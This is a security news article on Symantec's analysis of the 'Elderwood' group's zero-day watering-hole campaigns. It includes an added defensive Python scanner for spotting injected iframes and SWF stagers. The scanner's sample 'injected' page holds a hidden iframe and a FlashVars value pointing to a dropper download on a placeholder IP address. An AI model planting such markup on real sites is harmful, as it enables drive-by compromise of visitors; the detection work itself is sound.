UPDATE–The same team that attacked Google in the Aurora campaign in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero-day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.
The team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. Researchers at Symantec have been tracking the group, which they’ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.
The number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don’t have.
“In order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,” Gavin O’Gorman and Geoff McDonald of Symantec wrote in a detailed analysis of the Elderwood crew’s tactics.
“The scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. The resources required to identify and acquire useful information—let alone analyze that information—could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.”
The researchers said that this group is utilizing one technique, which they call a “watering hole” attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that’s frequented by employees of organizations in the sector that they’re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim’s machine.
The idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. Researchers at RSA Security also analyzed attacks of this kind in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that’s been used in targeted attacks by Chinese groups for several years.
Joe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there’s no question about the group’s capabilities.
“They’re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they’ve come out with,” Stewart said.
This Elderwood group has used a number of zero-days in the last couple of years as part of its attack campaigns, including the CVE-2012-1535 Flash vulnerability that Adobe patched last month and the CVE-2012-1875 Internet Explorer flaw that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.
“Although watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,” the paper says.
The connection to the attack on Google in late 2009, which was named Aurora at the time, comes from commonalities in the way the attackers obfuscate parts of their code, a technique that was also seen in the Hydraq Trojan, the piece of malware used in the Google attack.
“We believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,” O’Gorman and McDonald wrote.
“Additional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,” the researchers said.
The Elderwood team may have a custom platform set up to take exploit code for a new vulnerability, drop it into a benign-looking Word document or PDF, and bundle it with the Trojan payload so the components for a new attack are at hand as quickly as possible. The crew also has created a SWF file that is reused across multiple attacks, with small changes, to set up memory so that their exploit code lands where they want it.
“Instead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. In some attacks, the parameter name was “Elderwood.” The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,” the researchers said.
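The watering-hole pattern described above (an injected iframe or script on a legitimate page, and a reusable SWF that takes the Trojan's download location as a parameter) leaves artifacts in the page source that a site owner or incident responder can scan for. The following is an added example, not code from Symantec's report or from the article: a standard-library Python scanner that flags hidden or off-site iframes, off-site script includes, off-site SWF objects, and SWF objects whose FlashVars carry a URL. The site hostname, the allow-list of legitimate third-party hosts, the parameter name `dl`, and the sample pages are constructed assumptions; the 203.0.113.0/24 addresses are the RFC 5737 documentation range, not real infrastructure.

```python
"""Flag page-source artifacts typical of a watering-hole injection (added example)."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse


class InjectionScanner(HTMLParser):
    """Collect (indicator, detail) findings while parsing one page's HTML."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}  # known-good CDNs etc.
        self.findings = []
        self._in_object = False
        self._object_attrs = {}
        self._object_params = {}

    def _offsite(self, url):
        """True if the URL points at a host that is neither the site nor allow-listed."""
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host != self.site_host and host not in self.allowed

    def _check_swf(self, src, flashvars):
        """A reusable SWF stager takes the payload location as a FlashVars value."""
        if not src.lower().endswith(".swf"):
            return
        for name, values in parse_qs(flashvars).items():
            for value in values:
                if value.lower().startswith(("http://", "https://")):
                    self.findings.append(("swf_with_url_param", f"{name}={value}"))
        if self._offsite(src):
            self.findings.append(("offsite_swf", src))

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            # Injected frames are usually made invisible: zero-sized or display:none.
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or any(m in style for m in ("display:none", "visibility:hidden",
                                                  "width:0", "height:0")))
            if hidden or self._offsite(a.get("src", "")):
                self.findings.append(("hidden_or_offsite_iframe", a.get("src", "")))
        elif tag == "script" and self._offsite(a.get("src", "")):
            self.findings.append(("offsite_script", a["src"]))
        elif tag == "embed":
            self._check_swf(a.get("src", ""), a.get("flashvars", ""))
        elif tag == "object":
            self._in_object = True
            self._object_attrs = a
            self._object_params = {}
        elif tag == "param" and self._in_object:
            self._object_params[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._in_object:
            self._in_object = False
            src = self._object_attrs.get("data") or self._object_params.get("movie", "")
            self._check_swf(src, self._object_params.get("flashvars", ""))


def scan_html(html, site_host, allowed_hosts=()):
    """Return the list of (indicator, detail) findings for one page body."""
    scanner = InjectionScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (assumed site: news.example.com).
CLEAN_HTML = """<html><body>
<script src="/js/site.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<iframe src="https://news.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

INJECTED_HTML = """<html><body>
<p>Daily briefing</p>
<iframe src="http://203.0.113.7/wp/in.php" width="0" height="0" style="display:none"></iframe>
<object data="http://203.0.113.7/loader.swf" type="application/x-shockwave-flash">
  <param name="flashvars" value="dl=http://203.0.113.7/dropper.exe">
</object>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_HTML), ("injected", INJECTED_HTML)):
        print(label, scan_html(page, "news.example.com", {"cdn.example.net"}))
```

Run it over saved page bodies from a crawl of the site rather than live fetches, and seed the allow-list from a known-good copy of the site, since legitimate third-party script hosts will otherwise show up as off-site includes. The scanner is a triage aid: a hit on the SWF-with-URL-parameter indicator is the one that most directly matches the stager behaviour in the report, and a page that trips it deserves a full look at what the SWF downloads.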
The Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.
“The group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,” Symantec’s report says.
Stewart of Dell SecureWorks said that he hasn’t seen the groups he follows dropping a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.
“They’re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it’s located and some other details,” he said. “The reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they’re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. They’re all getting marching orders from the same place, but it’s not the exact same people hitting the keys.”
This larger group of attackers has been active for years, well before the attack on Google became public in early 2010.
“They were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,” Stewart said.
“This is years of constant, dedicated, persistent attacks.”
This story was updated on Sept. 7 to add comments from Joe Stewart.